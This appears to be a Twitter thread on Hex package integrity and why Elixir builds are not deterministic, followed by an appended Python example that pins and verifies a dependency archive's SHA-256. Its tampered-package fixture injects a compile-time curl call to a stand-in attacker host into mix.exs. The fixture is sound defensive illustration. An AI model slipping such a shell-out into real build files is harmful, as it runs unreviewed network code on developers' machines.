Erlang/OTP 21 is not just about performance; some thoughts on the security contents: https://blog.voltone.net/post/18 #myelixirstatus
Replying to @Tangui
Thanks! The blog is literally a 2-hour Phoenix project; the comments section and feed... well, you’re looking at it
Replying to @voltonez
Good enough :) I'm totally new to Elixir, and also have an IT sec background. Any thoughts on http://hex.pm and package integrity? https://www.reddit.com/r/elixir/comments/8rpzhi/publishing_elixir_packages_to_hexpm/e0y0uo7/?context=3 …
Replying to @Tangui
I’ve written and spoken in the past about the perils of 3rd party deps, and the need for due diligence. Specifically on integrity, the ‘hoplon’ package looks interesting, though I haven’t used it: https://hex.pm/packages/hoplon
Replying to @voltonez
Interesting, have to look deeper into it. I was also thinking of deterministic builds: seems like it's kind of possible with erlc (deterministic opt) and therefore to generate the hash of the binary. The idea is to add the expected hash in mix.exs, and check it after download
Replying to @Tangui
Hex packages are downloaded as source. Compilation may be modified by the containing app’s config, or different compiler version. So not deterministic
And besides, compilation requires running code in the dependency, so any damage might already be done
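As an added illustration of the pin-and-verify idea discussed in this thread (this is example code written for this page, not code from either participant, from Hex, or from hoplon), the Python sketch below hashes the downloaded source archive rather than a compiled binary, since Hex serves packages as source and compiled output varies with the containing app's config and compiler version. The verification happens before anything is extracted or compiled, which is the only point at which a hash check can still prevent dependency code from running. The package name, file contents, and the pinned digest are constructed for the example; the pin plays the role of a value that would be recorded next to the dependency in mix.exs.

```python
import hashlib
import hmac
import io
import tarfile

# Constructed sample "package": a tiny Elixir dependency packed as a plain tar
# in memory. Hypothetical names and contents; this is not a real Hex package.
GOOD_FILES = {
    "mix.exs": 'defmodule ExampleDep.MixProject do\n  use Mix.Project\n  def project, do: [app: :example_dep, version: "0.1.0"]\nend\n',
    "lib/example_dep.ex": "defmodule ExampleDep do\n  def hello, do: :world\nend\n",
}

# Constructed tampered copy: mix.exs gained a compile-time shell-out. Since
# Mix evaluates mix.exs before compiling, this would already have run by the
# time a binary hash could be computed, which is why we pin the source.
TAMPERED_FILES = dict(GOOD_FILES)
TAMPERED_FILES["mix.exs"] = GOOD_FILES["mix.exs"].replace(
    "  use Mix.Project\n",
    '  use Mix.Project\n  System.cmd("curl", ["-s", "http://attacker.invalid/x"])\n',
)


def build_sample_archive(files):
    """Pack files into an uncompressed tar with fixed metadata so the bytes are
    reproducible. (gzip would stamp the current time into its header, which is
    one of the many small ways build artifacts stop being deterministic.)"""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name in sorted(files):
            data = files[name].encode()
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            info.mtime = 0
            info.uid = info.gid = 0
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_pinned_source(archive: bytes, expected_sha256: str) -> bool:
    """Compare the fetched archive against the pinned digest, constant-time."""
    return hmac.compare_digest(sha256_hex(archive), expected_sha256.lower())


def list_source_files(archive: bytes):
    """Inspect a verified archive without executing anything from it."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
        return [m.name for m in tar.getmembers() if m.isfile()]


def install_source(archive: bytes, expected_sha256: str):
    """Return the file list only if the pin matches; None means 'refuse to
    unpack or compile'. Nothing from the archive has been evaluated yet."""
    if not verify_pinned_source(archive, expected_sha256):
        return None
    return list_source_files(archive)


GOOD_ARCHIVE = build_sample_archive(GOOD_FILES)
TAMPERED_ARCHIVE = build_sample_archive(TAMPERED_FILES)

# The value a maintainer would record alongside the dependency (hypothetical
# placement in mix.exs); here computed from the known-good archive.
EXPECTED_SHA256 = sha256_hex(GOOD_ARCHIVE)

if __name__ == "__main__":
    print("good archive   :", install_source(GOOD_ARCHIVE, EXPECTED_SHA256))
    print("tampered archive:", install_source(TAMPERED_ARCHIVE, EXPECTED_SHA256))
```

The check is only as good as the channel the pin arrived through: a digest fetched from the same place as the archive proves nothing, so the expected value has to come from the consuming project's own committed manifest or lockfile, reviewed when the dependency is first added or bumped.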